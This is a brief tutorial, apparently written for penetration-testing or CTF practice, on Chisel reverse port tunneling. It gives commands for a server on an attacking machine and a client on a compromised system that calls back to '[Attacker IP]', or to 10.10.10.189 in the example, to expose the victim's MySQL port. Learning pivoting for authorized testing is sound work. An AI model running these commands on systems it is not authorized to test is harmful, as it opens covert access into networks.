Introduction

Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions.

In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.

Creating a reverse tunnel

Run the following command on the attacking machine:

chisel server -p [Listen Port] --reverse &

This will setup a chisel server on Listen Port.

On the compromised systenm run:

chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] &

This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. Once it has connected to the remote chisel server, the chisel server will open Remote Port on the Remote Host and tunnel it to the Local Port of Local Host. From now on, any traffic sent to Remote Port on the Remote Host will be forwarded to the Local Port of Local Host.

Chisel also defines some defaults for these values, which means you can omit some of them:

Local Host - 0.0.0.0
Remote Host - 0.0.0.0 (server localhost)

As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to gain access to port 3306 on the compromised machine. On the attacking machine you run:

chisel server -p 1337 --reverse &

On the compromised system you will run:

chisel client 10.10.10.189:1337 R:localhost:3306:localhost:31337 &

The above basically translates to "Forward any traffic intended for port 31337 localhost on my attacking machine to port 3306 on the localhost of the compromised system".